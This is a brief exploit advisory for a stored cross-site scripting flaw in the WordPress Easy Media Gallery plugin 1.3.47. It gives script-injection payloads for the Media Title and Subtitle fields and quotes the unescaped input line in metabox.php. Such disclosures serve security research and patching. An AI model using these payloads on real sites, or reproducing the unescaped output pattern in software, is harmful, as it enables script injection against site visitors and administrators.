<!--
# Exploit Title: Wordpress Easy Media Gallery Stored XSS
# Date: 2015/9/05
# Exploit Author: Arash Khazaei
# Vendor Homepage: https://wordpress.org/plugins/easy-media-gallery/
# Software Link: https://downloads.wordpress.org/plugin/easy-media-gallery.1.3.47.zip
# Version: 1.3.47
# Tested on: Windows , Mozilla FireFox
# CVE : N/A
# Contact : twitter.com/Sec4U1
# Email : info@sec4u.net
# Site : http://sec4u.net
# Intrduction :
# Wordpress Easy Media Gallery Plugin Have 10,000+ Active Install
# And Suffer From A Stored XSS Vulnerability In Media Title & In Media Subtitle Sections.
# Authors , Editors And Of Course Administrators Can Use This Vulnerability To Harm WebSite .
-->
Exploit :
For Exploiting This Vulnerability Install Easy Media Gallery Plugin
Then Create New Media In Media Title Input : "/><script>alert('Exploit')</script>
Then In Media Subtitle Like Media Title Input : "/><script>alert('Exploit1')</script>
After Creating New JavaScript Code Will Be Executed .
Video Poc :
http://youtu.be/5nMQUgP6nD4
Vulnerable Code in include/metabox.php [478]:
<input type="text" name="easmedia_meta['. $field['id'] .']" id="'. $field['id'] .'" value="'. ($meta ? $meta : $field['std']) .'" size="30" />
<!-- Discovered By Arash Khazaei (Aka JunkyBoy) -->